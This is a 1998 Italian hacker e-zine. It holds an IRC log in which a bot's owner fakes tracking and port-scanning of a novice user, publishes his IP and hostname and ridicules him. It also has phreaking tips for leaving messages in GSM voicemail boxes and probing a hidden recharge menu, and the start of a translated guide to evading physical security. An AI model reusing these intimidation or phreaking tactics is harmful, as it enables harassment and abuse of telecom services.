*** NullMind (nullmind@hd45-216.hil.compuserve.com) has joined #phreak.it
<madsem> ciao null !!!!!
<NullMind> re all
<NullMind> ciao mad :)
<madhatt> ciaoooooo
<ChatRobot> Hi NullMind, givin'op...
<madhatt> che dici di bello
*** ChatRobot sets mode: +o NullMind
<madhatt> io sono nella ***** non mi funziona un green
<NullMind> 10x
<madsem> null ----) query
<NullMind> ma tra un po' esco
<madsem> solo un attimo
<NullMind> dimmi
<madhatt> insomma come devo fare con sto boT ??????
*** madhatt was kicked by ChatRobot (ChatRobotÏ)
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it
*** madhatt was kicked by Tillu (banned: requestÏ)
<madsem> loggati !!!!
<ChatRobot> EHEHE TUTTO LOGGATO!!!!
<ChatRobot> Ora faccio un bel cut & paste :)
<ChatRobot> Bravo blum :)
<Blum> di cosa
*** Tillu sets mode: -b madhatt!*@*
<Blum> di cosa?
<madsem> hai provato a loggarti una volta di troppo !!!!
<Blum> io?
<madsem> eri in dcc pure tu'
<NullMind> ciao ci vediam staseraaaaaaaaaa
<Blum> si
<madsem> ciao null !!!!
<madsem> hai cercato di loggarti nel bot ?
*** NullMind (nullmind@hd45-216.hil.compuserve.com) has left #phreak.it
(NullMindÏ)
<Blum> ho scitto .help
*** Galileo^ (nmwefc@ppp9-va.xcom.it) has joined #phreak.it
<Galileo^> salve
<madsem> bravo ! e poi ?
<madsem> ciao galileo !
<madsem> scusa ma siamo nel difficile ....
<Blum> e poi basta
<madsem> strano ... devo verificare il log appena sono a kasa ....
<Blum> ok
<Galileo^> ragazzi visitate il mio sito www.angelfire.com/on/sectoronex/index.html
<madsem> kosa proponi nel sito ???

Session Close: Tue Sep 08 08:18:55 1998
Session Start: Tue Sep 08 08:21:39 1998

* Logging #phreak.it to: [#phreak_it.log]
<Galileo^> bello l'ho gia' visitato
<ChatRobot> Free Op only for assholes!
<Anti-S> :)
<Galileo^> senti Anti-S mi fai entrare in hackers.it?
<madhatt> anche me
<madhatt> fammi antrare li
*** Retrieving #phreak.it channel info...
<Galileo^> allora posso entrare ??
*** ChatRobot changes topic to "ChatRobot Surveillance Mode against
> madhatt <Ï"

<madhatt> cosa vuol dire non sei a kasa ??
<madhatt> ?????
<madsem> sono in ufficio
<madhatt> e allora ?
<madhatt> oppami nel bot!
<madhatt> NullMind
<madhatt> che dice adesso il bot ?
<ChatRobot> NullMind is a UnderC member!
<madhatt> madhatt
<ChatRobot> madhatt is an asshole
<madhatt> Tillu
<Anti-S> Hackers.it non è perotetto puo entere chi vuole
<ChatRobot> Tillu is a big dick guy!
<madsem> madhatt 6 bello!!
<ChatRobot> madhatt is an asshole
<madsem> I fuck your asshole : P
<ChatRobot> asshole is madhatt
<madhatt> bello io ?
<madhatt> se non mi hai neanche visto
<ChatRobot> asshole is always asshole
<madsem> boh ... io vado a kasa .... ci vediamo piu' tardi ....
<madhatt> no
<madhatt> oppami nel bot
<madhatt> controllo io il canale!
<madhatt> :-)))
<ChatRobot> -Hello MadSem-!!!!
<madhatt> hello chatrobot
<madsem> HO L'IP DEL NEGOZIO !!! NON QUELLO DI KASA !!! NON POSSO ACCEDERE
AL BOT !!!!!!!!
*** ChatRobot sets mode: +m
*** D4eDaeluS sets mode: -m
<ChatRobot> hello madhatt
<madhatt> ok
<madhatt> how are you ?
<madsem> buonanotte
<madsem> a tutti !!!!
*** ArmaLetal (peppo@ppp4-va.xcom.it) has joined #phreak.it
<madsem> io vado a fare cena !!!
<madhatt> dove lavori ????
<madsem> in un negozio di pc
<madhatt> dove?
<madsem> to
<madhatt> a torino ?
<madsem> y
<madhatt> e' tuo il negozio ?
<madsem> y
<madhatt> fai molti $o£di ?
<madsem> te lo dico la prossima volta ....
*** madsem (~madsem@c-to5-160.tin.it) has left #phreak.it (madsemÏ)
<ChatRobot> No More UnDeRcOnStRuCtIoN Members in channel > -#phreak.it- < !
<madhatt> ChatRobot
<ChatRobot> ChatRovot v1.02 (C) 1998 by UnderC
<madhatt> underc
<ChatRobot> UnDeRcOnStRuCtIoN!
<madhatt> warez
<ChatRobot> I'm a WaReZ bot... DCC ME

Qui c'e' stato un piccolo sbaglio mio, ho buttato il log nel canale, ma il
lamer non se n'e' accorto...

<ChatRobot> Session Start: Tue Sep 08 07:58:10 1998
<ChatRobot> * Logging #phreak.it to: [lamer.log]
<ChatRobot> <madsem> io penso di si'
<ChatRobot> <madhatt> non hai un bel pensiero
<ChatRobot> <madsem> ehehehehehehehehehe !
<ChatRobot> <madhatt> poi che parole dice sto bot ?
<ChatRobot> <madhatt> cosa sa dire ?
<ChatRobot> <madsem> dipende da quello ke scrivi ....
<ChatRobot> <madsem> guarda :
<ChatRobot> <madsem> hacking
<ChatRobot> <madsem> e lui :
<ChatRobot> <ChatRobot> Good Thing DUDE!
<ChatRobot> <madhatt> cracking
<ChatRobot> <madsem> oppure :
<ChatRobot> <ChatRobot> Good Thing DUDE!
<ChatRobot> <madhatt> pula!
<ChatRobot> <ChatRobot> Fuck0ff!!!
<ChatRobot> <madhatt> Mad Hatters
<ChatRobot> <madsem> lamer
<ChatRobot> <ChatRobot> Mothafucker
<ChatRobot> <madhatt> <ChaRobot> Is number one!
<ChatRobot> <madsem DCC ME
*** Anti-S has quit IRC (Connection reset by peerÏ)
*** You were kicked by Tillu (floodÏ)
*** Attempting to rejoin...
*** Rejoined channel #phreak.it
#phreak.it topic is ChatRobot Surveillance Mode against > madhatt <
#phreak.it topic set by ChatRobot on Tue Sep 08 20:06:14
<madhatt> un bot che kikka l'altro bot!
*** M0rg4na sets mode: +o ChatRobot
*** madhatt was kicked by ChatRobot (ChatRobotÏ)
*** Galileo^ has quit IRC (Ping timeoutÏ)
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it
*** ChatRobot sets mode: -o Tillu
<madhatt> kikka
*** D4eDaeluS sets mode: +o Tillu
*** M0rg4na sets mode: +o Tillu
*** ChatRobot sets mode: -ooo D4eDaeluS M0rg4na Tillu
<ChatRobot> Protection Mode 4 ChatRobot
*** Anti-S (AntiS@a-kl1-61.tin.it) has joined #phreak.it
<madhatt> hhaah
<madhatt> un bot che toglie l'op agli altri bot!

Qui entra Truijllo e lo faccio diventare "complice" del gioco!


*** Truijllo (graffiti@a-ca7-4.tin.it) has joined #phreak.it
<madhatt> hahhaahha
*** ChatRobot sets mode: +o M0rg4na
<Truijllo> salve !
<madhatt> questa e bella
<Truijllo> salve chatrobot !
*** Galileo (nmwefc@ppp9-va.xcom.it) has joined #phreak.it
<ChatRobot> Truijllo: Hello
*** hollenhun (~x@www.leslee.com) has joined #phreak.it
*** ChatRobot sets mode: +o D4eDaeluS
*** ChatRobot sets mode: +o Tillu
*** hollenhun (~x@www.leslee.com) has left #phreak.it (hollenhunÏ)
<Truijllo> raga...è da un po di tempo che vedo sti bot qua
<Truijllo> hanno sempre l'op
<Truijllo> poii sono un casino
*** ArmaLetal (peppo@ppp4-va.xcom.it) has left #phreak.it (ArmaLetalÏ)
<Truijllo> non si riesce in nessun modo a comunicare coi piloti
<madhatt> devi comunicare con madsem
<Truijllo> ma esiste?
<madhatt> si
<Truijllo> non riesco a pilotare nemmeno sti "£%$"£% di BOT
<ChatRobot> madsem is a friend of mine!
<Truijllo> NON RIESCO a FARCI NIENTE !!!!!
<Truijllo> mmmmmmm
<Truijllo> se lo casso lo spulcio !
*** Blum (Blum@195.223.184.250) has joined #phreak.it
<madhatt> Blum hai provato il green ????
<ChatRobot> No GrEeNz HeRe!!!
<madhatt> lamer
<ChatRobot> lamer?! are u talkin' about yourself?!!!
<Truijllo> mo provo a smanettarci di nuovo magari è la mia serata
<madhatt> Truijllo smanettare cosa ?
<Truijllo> Sti £$&% di BOT
<Truijllo> li apro in due come una mela
<Truijllo> :o)
<madhatt> cosa vuol dire £$&% ???
<Truijllo> ...indovina
<Truijllo> :o)
<madhatt> non lo so
<Truijllo> ti aiuto ( @ .. o
<madhatt> boo
<madhatt> aiutami ancora
<madhatt> un altro aiutino
<madhatt> !!!!!!!!!!!!!
<madhatt> !!!!!!!!!!!!!
<Truijllo> Ca..o
<Truijllo> dove i .. sono 2 letterre uguali
<madhatt> zz ????
<Truijllo> qualcosa tipo ZZ
<Truijllo> esatto
<Truijllo> EUREKA !
<Truijllo> CI SONO
<ChatRobot> Truijllo is a friend of mine!
<Truijllo> che culo !
<ChatRobot> ... givin' OP
<madhatt> cosa sei riuscito a fare???
*** ChatRobot sets mode: +o Truijllo
<madhatt> wow
<ChatRobot> Truijllo is a friend of mine!
<madhatt> fa in modo che oppi anche
*** ArmaLetal (peppo@ppp4-va.xcom.it) has joined #phreak.it
*** ArmaLetal (peppo@ppp4-va.xcom.it) has left #phreak.it (ArmaLetalÏ)
*** Galileo has quit IRC (Ping timeoutÏ)
*** madhatt was kicked by ChatRobot (ChatRobotÏ)
<ChatRobot> :)
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it
*** ChatRobot sets mode: -o Truijllo
*** ChatRobot sets mode: -ooo D4eDaeluS M0rg4na Tillu
<ChatRobot> Surveillance mode #1
<ChatRobot> Stand-by for 5 minutes
*** ChatRobot is now known as ChatAWAY
<madhatt> warez
<madhatt> hacking
*** ChatAWAY sets mode: +o M0rg4na
-> -#phreak.it- Truijllo: insert pass
-> -#phreak.it- Truijllo: DEBUG MODE

Da qui simulo una modalita' DEBUG, leggete le query che ha scambiato con
Truijllo! Gli faccio credere che lo sto tracciando!

*** ChatAWAY is now known as ChatDEBUG
<ChatDEBUG> Ready
<ChatDEBUG> ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122.iol.it - from 24mins12secs
<ChatDEBUG> madhatt: received DCC CHAT: ignored
*** Li-Nux (ZXC@a-cs4-48.tin.it) has joined #phreak.it
<madhatt> perche fa cosi' ????????
<ChatDEBUG> Li-Nux: auto op in friend list
*** ChatDEBUG sets mode: +o Li-Nux
<ChatDEBUG> madhatt: QUERY : ignored
<ChatDEBUG> ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86
-122.iol.it - from 28mins12secs
<ChatDEBUG> madhatt: received DCC CHAT: ignored
<ChatDEBUG> Blum: received DCC CHAT: ignored
-> [madhatt] VERSION
<ChatDEBUG> madhatt: VERSION reply: mIRC32 v5.31 K.Mardam-Bey
-> [madhatt] USERINFO
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has left #phreak.it (madhattÏ)
<ChatDEBUG> madhatt: Mad Hatters (ak.madhatters@angelfire.com) Idle 11 seconds
*** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it
<ChatDEBUG> madhatt: Mad Hatters (ak.madhatters@angelfire.com) Idle 11 seconds > joined #phreak.it
<ChatDEBUG> BOT OWNER in DCC CHAT
<ChatDEBUG> Ready to accept commands
*** pitox (pitox@ppp-ascolipiceno79-71.iol.it) has joined #phreak.it
<ChatDEBUG> Hostmask & Password OK
<ChatDEBUG> Log Request for > madhatt < in Surveillance mode #1
<ChatDEBUG> Sending > madhatt < log in DCC SEND
*** pitox (pitox@ppp-ascolipiceno79-71.iol.it) has left #phreak.it (pitoxÏ)
<ChatDEBUG> DCC SEND Terminated
<ChatDEBUG> ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122.iol.it - from 36mins12secs
*** Blum (Blum@195.223.184.250) has left #phreak.it (BlumÏ)
<ChatDEBUG> End of tracking > madhatt <
*** Retrieving #phreak.it channel info...
*** ChatDEBUG changes topic to "UnDeR CoNsTrUcTiOn is HERE!Ï"
<ChatDEBUG> BOT OWNER off debug requested
<ChatDEBUG> Command OK
*** ChatDEBUG is now known as ChatAWAY
*** ChatAWAY sets mode: +o Truijllo
*** ChatAWAY sets mode: +o Tillu
*** ChatAWAY sets mode: +o D4eDaeluS
*** ChatAWAY is now known as ChatRobot
* ChatRobot has come back!
<ChatRobot> -madhatt- is blacklisted
* ChatRobot shutdown for restart


Session Close: Tue Sep 08 09:23:38 1998
Session Start: Tue Sep 08 09:23:50 1998


*** Now talking in #phreak.it
#phreak.it topic is UnDeR CoNsTrUcTiOn is HERE!
#phreak.it topic set by ChatDEBUG on Tue Sep 08 21:01:36
*** M0rg4na sets mode: +o ChatRobot
<ChatRobot> TNX M0rg4na
*** hollenhun (~x@www.leslee.com) has joined #phreak.it
*** hollenhun (~x@www.leslee.com) has left #phreak.it (hollenhunÏ)
<ChatRobot> *** Looking up ppp-cesena86-122.iol.it
<ChatRobot> *** Resolved ppp-cesena86-122.iol.it to 195.210.86.122 connected from Italia On Line Service Provider - CESENA
<ChatRobot> *** Scanning ports of 195.210.86.122
-> [madhatt] USERINFO
*** Truijllo sets mode: +o madhatt
*** Anti-S (AntiS@a-kl1-61.tin.it) has left #phreak.it (Anti-SÏ)
*** ChatRobot sets mode: -o madhatt
<ChatRobot> No op for > madhatt <
-> [madhatt] USERINFO
*** madhatt has quit IRC (Ping timeoutÏ)
<ChatRobot> PING TIMEOUT porcaputtana
<ChatRobot> :)
*** Retrieving #phreak.it channel info...
*** ChatRobot changes topic to "madhatt e' nominato Best Lamer 1998 da > ChatRobot! < :-))))Ï"
<ChatRobot> speriamo che si riconnette
<Li-Nux> si
<ChatRobot> Truijllo per caso hai loggato le query che ti ha fatto?!
<Truijllo> l'ho ancora aperta..se vuoi lo faccio
<ChatRobot> yep, poi me le mandi plz?!
Session Close: Tue Sep 08 09:34:12 1998


I CHAT IN DCC DI MADHATT E BLUM!


Session Start: Tue Sep 08 08:05:42 1998

* Logging Chat with Blum to: [blum.log]
<ChatRobot> Ready
<Blum> green
<ChatRobot> No GrEeNz HeRe!
<Blum> ls
<ChatRobot> ls ?
<Blum> dir
<ChatRobot> Please insert password first!
<Blum> .help
<ChatRobot> No help available, insert password first
-
DCC session closed

Session Close: Tue Sep 08 08:13:11 1998
Session Start: Tue Sep 08 08:05:13 1998

* Logging Chat with madhatt to: [madhatt.log]
<ChatRobot> Ready
-
DCC session closed

Session Close: Tue Sep 08 08:08:21 1998
Session Start: Tue Sep 08 08:09:03 1998
DCC Chat session
-
Client: madhatt (195.210.86.122)
-
Acknowledging chat request...
DCC Chat connection established
-
<ChatRobot> Ready
<madhatt> help
<ChatRobot> No help available, insert password first
<madhatt> log
<ChatRobot> lamerz found ... killing in progress !!!!!!!
<madhatt> nooooo
-
DCC session closed
Session Close: Tue Sep 08 08:13:31 1998

Le conversazioni con l'amico e complice TRUIJLLO!

madhatt buffer saved on Tue Sep 08 23:15:13 1998
<madhatt> come hai fatto a farti oppare?
<Truijllo> sto smanettando a ufo
<Truijllo> un casino di passaggi
<madhatt> hai indovinato la pass ???????
<madhatt> come hai fatto
<madhatt> ti prego dimmelo!
<Truijllo> ho messo pass e la mia pass
<madhatt> cioe' ?
<Truijllo> comando pass password
<madhatt> poi ?
<madhatt> faccio pass
<madhatt> e poi ?
<Truijllo> ho messo la mia password
<madhatt> !!!!!!!!!!
<madhatt> cioe'????
<madhatt> te la sei inventata tu ?
<Truijllo> si
<madhatt> allora me ne invento una anchio
<Truijllo> cosa non si fa col culo eh ?
<madhatt> boo
<madhatt> a me non funziona
<madhatt> sei sicuro che sia cosi' ?
<madhatt> ???
<madhatt> dimmi esattamente cosa hai fatto!!!!!!
<Truijllo> digita pass + password
<Truijllo> nel DCC
<madhatt> ecco cosa mi ha detto No hostmask registered! Access not allowed
<madhatt> e adesso ?
<madhatt> oppami te
<madhatt> please
<Truijllo> probabilmente ero registrato
<Truijllo> azz
<madhatt> forse madsem e registrato anche lui con tin
<madhatt> ma cosa sta facendo ?
<Truijllo> boh...inizio a non capirci + nulla
<Truijllo> forse gli stiamo scaricando troppe cose addosso....flood
<madhatt> che si fa' adesso?
<Truijllo> boh
<madhatt> sovraccarichiamolo e vediamo cosa succede
<Truijllo> ...waiting :o)
<Truijllo> un tipo mi sta suggerendo una procedura...wait
<Truijllo> comunicher=....
<madhatt> ok
<madhatt> che stai facendo ?
<Truijllo> wait
<madhatt> ok
<madhatt> ma poi spiegami tutto
<madhatt> ma che sta facendo ?????
<madhatt> ooo
<Truijllo> ...lo incasino :o)
<madhatt> adesso ???
<madhatt> faccio una query e mi registro
<madhatt> come faccio adesso ????????
<madhatt> perche non riesco a fargli il DCC chat ???
<Truijllo> quello che esce sono le operazioni che sta facendo lui
<Truijllo> se ti ignora.....
<madhatt> come faccio a farmi oppare ????
<madhatt> ???????
<madhatt> uffa
<madhatt> cosa devo fare
<madhatt> perche dice cosi' ChatRobot is still tracking madhatt!~ak.madhat@p
pp-cesena86-122.iol.it - from 28mins12secs ????
<madhatt> ????????
<madhatt> ???????
<Truijllo> wait
<madhatt> hum
<madhatt> ma perche
<madhatt> spiegami
<Truijllo> mmmmmm
<Truijllo> ho visto cose tipo dns etc.....
<madhatt> :-(((
<Truijllo> forse ti sta tracciando
<madhatt> cioe' ?
*** egoge is on IRC (sergio)
<madhatt> cosa vuol dire tracciando ?
<Truijllo> cerca il tuo ip
<madhatt> e perche ??????????????
<madhatt> ???????????????????????????
<Truijllo> se fai cazzate neinte di strano sputtani tutto a tutti
<madhatt> ????????????????????
<madhatt> cioe?
<madhatt> spiegati megliiiiiooooooooooooooooo
<madhatt> e periccoloso ??????
<Truijllo> se fai cazzate si
<madhatt> che kazzate dovrei fare?
<Truijllo> hackerare server etc
<madhatt> aiutami!!!!
<Truijllo> ti monitorizzano tutto quello che fai etc....
<madhatt> perche fa' cosi
<madhatt> ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122.
iol.it - from 32mins12secs
<madhatt> perche ce l'ha con me ?
<madhatt> ?????????????????????????????????????
<madhatt> ??????????????????????????????????
<madhatt> ???????????????????????
<Truijllo> aspetta la fine del debug
*** Aidi is on IRC ( Adelaide ( norvegia ))
<madhatt> cosa e il debug ????????
<Truijllo> ...beh l'hai quasi floddato con DCC etc.....
<madhatt> adesso io mi scollego"
<madhatt> cosi sono a posto vero ?
<Truijllo> modalità in cui si protegge e vede se ci sono errori
*** Aidi has left IRC
<madhatt> e preiccoloso ?
<Truijllo> l'importante è che ora stia buono buonino
<madhatt> se mi scollego cosa succede ?
<madhatt> BOT OWNER in DCC CHAT
<madhatt> cosa fa' adesso ?
<madhatt> ????????????????????
*** clausxman has left IRC
<madhatt> ????????????????
<madhatt> ????????????????
<Truijllo> fa effetto sogliola
<madhatt> cioe' ?
<Truijllo> cerca di fare ( tu ) come una sogliola
<Truijllo> lascia passare il predatore sopra di te
<madhatt> cioe'?
<madhatt> ma mi stai prendendo in giro ?
<Truijllo> tranquillizzati
<Truijllo> uso metafore....
<Truijllo> era er dire non fare niente
*** clausxman is on IRC
<madhatt> non usare metafore
<Truijllo> ok
<Truijllo> scusa
<madhatt> adesso che fa' ?
<Truijllo> aspetta...mi arriva roba tipo che il gestore è entrato
<madhatt> ????????
<madhatt> cioe'?
<madhatt> ma che stai facendo te?
<madhatt> ?????????
<Truijllo> il tipo che l'ha costruito ( un cazzone cazzuto ) ha di nuovo il
possesso del coso !
<madhatt> allora ?
<madhatt> adesso che fa' ?
<madhatt> ale' a smesso!?
<Truijllo> speriamo sia morto
<Truijllo> non mi da segni di vita
<madhatt> chi deve essere morto ?
<madhatt> insomma adesso
<madhatt> io devo andare
<madhatt> dimmi brevemente cosa e successo
<Truijllo> il bot
<madhatt> si
<madhatt> vai avnti!!!!!
<madhatt> che devo andare
<Truijllo> niente di strano che abbia portato a termine alcune sue operazioni
con tracing etc
<Truijllo> se stacchi ricorda una cosa
<madhatt> cosa ?
<Truijllo> stai + attento
<Truijllo> non offendere nessuno
<Truijllo> non provocare
<madhatt> a che cosa dovrei stare attento
<Truijllo> nessuno
<madhatt> ok ma perche??????
<madhatt> madhatt is blacklisted cosa vuol dire ?
<Truijllo> non ne sono sicuro ma pu= aver tracciato qualcuno
<madhatt> cosa vuol dire?
<madhatt> tracciato ?
<Truijllo> non ci metterei la mano sul fuoco ..... ma starei attento ugualmente
<madhatt> a che cosa???
<Truijllo> forse ha messo comandi sbagliati
<madhatt> allora io a cosa devo stare attento?
<Truijllo> o forse è tutto una bufala, anche se organizzata sin troppo bene
<Truijllo> quello sempre
<madhatt> e il bot cosa ha fatto su di me?
<madhatt> e cosa puo' succedere?
<Truijllo> ok
<Truijllo> ha preso il tuo IP
<madhatt> va bene
<madhatt> poi ?
<Truijllo> ..sempre che l'abbia fatto
<madhatt> dove e andato adesso ?
<Truijllo> e l'ha messo da qualche parte
<madhatt> ok
*** clausxman has left IRC
<madhatt> ma se io mi disconnetto e mi ricconetto l'ip cambia!
<Truijllo> se tu rompi le palle al proprietario del bot ( chi cazzo è? )
<madhatt> madsem o NullMind
<Truijllo> in maniera piuttostoi pesante
<madhatt> si
<madhatt> cosa succede ?
<madhatt> ????????
<madhatt> ???????????????????????
<Truijllo> lui va a vedere il tuo IP...fa una chiamata alla centrale telecom
<madhatt> e poi ?
<Truijllo> e gli dice..chi con questo IP a quest'ora si è collegato...dove? chi è?
<madhatt> e poi ?
<Truijllo> e poi sono cazzi amari
<madhatt> ok
<madhatt> grazie!
<Truijllo> ma è una via complicata
<madhatt> *** Looking up ppp-cesena86-122.iol.it
<Truijllo> non è che danno i nomi a cani e porci i tipi
<madhatt> adesso cosa fa'?
<Truijllo> boh...non sono Dio non lo so !
<madhatt> senti scrivimi per e-mail
<Truijllo> dai
<Truijllo> dimmi che vuoi che ti scriva
*** -----=Ý<×> 2ÝRapporto del Whois da13 madhatt2Ý <×>Ý=-----
*** -=Ý6IndirizzoÝ=- ~ak.madhat@ppp-cesena86-122.iol.it
*** -=Ý6Nome RealeÝ=- Mad Hatters
*** -=Ý6CanaliÝ=- #phreak.it
*** -=Ý6ServerÝ=- irc.tin.it * - Telecom Italia Net - Italy
*** -=Ý6E' in IdleÝ=- 0.02194 Ora 1.31667 Minuti 19 Secondi
*** ---------=Ý<×> 2Ý13Fine2 del Rapporto del WhoisÝ <×>Ý=---------
<Truijllo> c 6?
<Truijllo> tranquillo
<Truijllo> respira a pieni polmoni
<Truijllo> forse ci sono
<Truijllo> cazz
<Truijllo> c 6?
<Truijllo> parlami
<Truijllo> sei vivo?
-> -madhatt- sei vivo?
*** <=- -ÝDisintegrator raising in progress...Ý- -=> 6madhatt  Non è su IRC
ora!
End of madhatt buffer Tue Sep 08 23:15:13 1998

>> notevole !!!! mad hatters rimarra' per sempre nei nostri cuori !!!<<
>> chat ha anche contribuito con un trafiletto di vita quotidiana cellulare ...<<


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Cellular Tips & Trick & News 22/09/1998] UnDeR CoNsTrUcTiOn ³
³ [PhReAk SeCtIoN] :) Articolo di: ChatR0bot ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Infos da usare per il puro scopo di studio e divertimento, mi
raccomando non fate cazzate!

1) Invio dei messaggi alle segreterie telefoniche TIM e OMNITEL

La tua fidanzata lascia il telefonino staccato senza segreteria
telefonica e tu stai provando da 3 ore a chiamarla senza successo? O
vuoi semplicemente riempire la segreteria telefonica del cellulare di
un tuo conoscente con spernacchiate varie, ma non ha la segreteria
abilitata?

Ebbene, puoi mandare messaggi alle segreterie telefoniche degli utenti
GSM - anche se non hanno abilitato il servizio -.

Come? Il principio e' in realta' semplicissimo.

L'abilitazione della segreteria telefonica cellulare in realta' non e'
altro che una deviazione delle chiamate in arrivo verso un secondo
numero, molto simile al proprio numero di telefono.

Chiamata ---> Numero 1 ---> Numero 2
(Cellulare) (Segreteria)

Dunque, se con un altro cellulare GSM chiamiamo DIRETTAMENTE il
secondo numero, quello della segreteria, potremo accedere al servizio,
anche se l'utente non ha attivato la deviazione chiamate verso
quell'altro numero!
Quando l'utente accendera' il cellulare, ricevera' un messaggio SMS
dal proprio fornitore che lo avvertira' della presenza di un certo
numero di messaggi nella segreteria.

Ecco a quali numeri telefonare:

Per i cellulari TIM:

Prefisso / 55 / Numero

Per i cellulari OMNITEL:

Prefisso / 20 / Numero

Attenzione, e' importantissimo: funziona SOLO e SOLTANTO se chiamate
da un altro cellulare!

2) Servizio SMS TIM accessibile con il modem di casa e con un
menu-guida!

Basta chiamare con un modem il numero 0335-960-9600 e seguire i
menu'... e'
il centro SMS di Telecom, vi puo' accedere chiunque, manda messaggi
-credo - ovunque ma soprattutto per mandare messaggi in italia e'
velocissimo :)

Credo anche che costi un bordello di soldi! :)

3) Il 911, se fatto da un cellulare gsm telecom, fa rispondere un
fischietto che sembra quello di un modem.... che cosa e'???!?!?!!

4) Eccoti una novita' freska freska... relativa alle ricariche tim...
su cui andrebbero effettuate approfondite ricerche!


Quando ti scade il credito alla tim card il 916 ha una apposita
opzione di
menu

1) Ricaricare il telefonino
8) Riascoltare i messaggi
..... altre voci di menu ....


Quando selezioni 1, stranamente si sente un nuovo menu

1) Ricarica tramite Ricaricard
e BASTA

Un menu inutile, non credi? dato che tutte le ricariche effettuate dal
cello avvengono tramite ricaricard! Allora io da bravo friker cosa ho
fatto? ho premuto 2 e... badabem badabem badabem! Esce un menu
nascosto piuttosto strano, qualcosa che suona piu' o meno cosi'...

"
Inserisca il suo codice segreto a 5 cifre" (inserire un codice
qualsiasi)
"
Reinserisca il codice appena digitato" (reinserire lo stesso codice)

poi elencava i tagli disponibili per la ricarica ricordando l'addebito
di 10000 lire in piu'

1) Per ricarica da 50000
2) Per ricarica da 100000
3) Per ricarica da 150000
4) Per altra ricarica

Selezionando una ricarica, il 916 rimane in un loop infinito di
"
L'operazione e' in corso, la preghiamo di attendere"

E' da studiare, non credi... :))))

Probabilmente si tratta della ricarica on-line su carta di credito o
c/c che partira' dall'anno prossimo... ma se nel frattempo la si puo'
studiare... :)))

Buon friking a tutti!

Info by ChatRobot of PsXKill3R Research Group
EMail adegamisoy@yahoo.com
You can reach me as ChatRobot on IRCnet.


>> un articolo vecchio ma interessante .... una traduzione di nightwolf di<<
>> un vecchio txt made in LoD ..... leggete e pensate !!!!<<

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Identificare, Attaccare, Eliminare ed ³
³ Eludere la Sicurezza Fisica ed i UnDeR CoNsTrUcTiOn ³
³ Sistemi di Rilevamento Intrusione] Articolo di: NightWolf ³
³ [MiSc SeCtIoN] ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

(Usate titoli + corti NdR :)

Il Giornale Tecnico LOD/H: File #3 di 12


Lex Luthor e la Legion Of Doom/Hackers Presentano:

Identificare, Attaccare, Eliminare ed Eludere la
Sicurezza Fisica ed i Sistemi di Rilevamento Intrusione

PARTE I: IL PERIMETRO


Ci sono due ragioni principali per cui ho scritto quest'articolo:

1) Per prevenire la scoperta e/o cattura di diversi phreakers, hackers ed altri
che cercano di accedere a: centrali della compagnia dei telefoni, centraline
telefoniche, uffici corporativi, dischariche e simili.

2) Per creare una conoscenza e provare ai vari manager di sicurezza, guardie, e
consulenti, quanto sia facile eludere i loro sistemi di sicurezza a causa
della mancanza di pianificazione, ignoranza e stupidita'.

In passato, ho scritto articoli sull'"
Attaccare, Eliminare ed Eludere" la si-
surezza dei computers. Ora faccio uso degli stessi metodi e li applico alla
sicurezza fisica. Le informazioni contenute qui dentro sono state otenute da
una ricerca sui differenti mezzi usati nella sicurezza fisica e da test prati-
ci che io ed altri abbiamo condotto su queste apparecchiature.


INTRODUZIONE:
-------------

La sicurezza fisica si basa sui seguenti principi per proteggere uno stabile:
Deterrenza, Prevenzione, Rilevamento, Risposta. I Deterrenti vengono usati per
'spaventare' l'intruso che cerca di entrare. La Prevenzione cerca di impedire
all'intruso di ottenere l'accesso. Il Rilevamento 'vede' l'intruso mentre tenta
di ottenere l'accesso. La Risposta cerca di impedire e/o prevenire la maggior
parte di danno o accesso allo stabile dopo il Rilevamento. In questo articolo e
nel campo dell'industria si designano 3 livelli di sicurezza per concordare con
i bisogni degli stabili. Sono Basso, Medio ed Alto. La quantita' ed il tipo di
apparecchiature usate da uno stabile sono direttamente proporzionali al livello
di sicurezza che 'pensa' di avere bisogno. Quando dico 'stabile' mi riferisco
a tutte le persone che curano la sicurezza ed all'edificio stesso che cercano
di proteggere. Questo articolo rigrardera' maggiormente la protezione del peri-
metro. Ho in programma altri due articoli di questa serie. Il secondo parlera'
della sicurezza all'esterno dell'edificio: lucchetti a combinazione, dispositi-
vi di rilevamento rottura finestre, interruttori a contatto magnetico ecc. ecc.
La terza parte trattera' dei sistemi di sicurezza all'interno di uno stabile:
sistemi di rilevamento ad Infrarossi Passivi, sensori ultrasonici, sistemi a
microonde interni ed i vari sistemi di accesso che richiedono il pass.

IL PERIMETRO:
-------------

La prima linea di difesa di uno stabile e' il suo perimetro. Il perimetro puo'
presentare una o tutte delle seguenti caratteristiche:

* Una rete singola

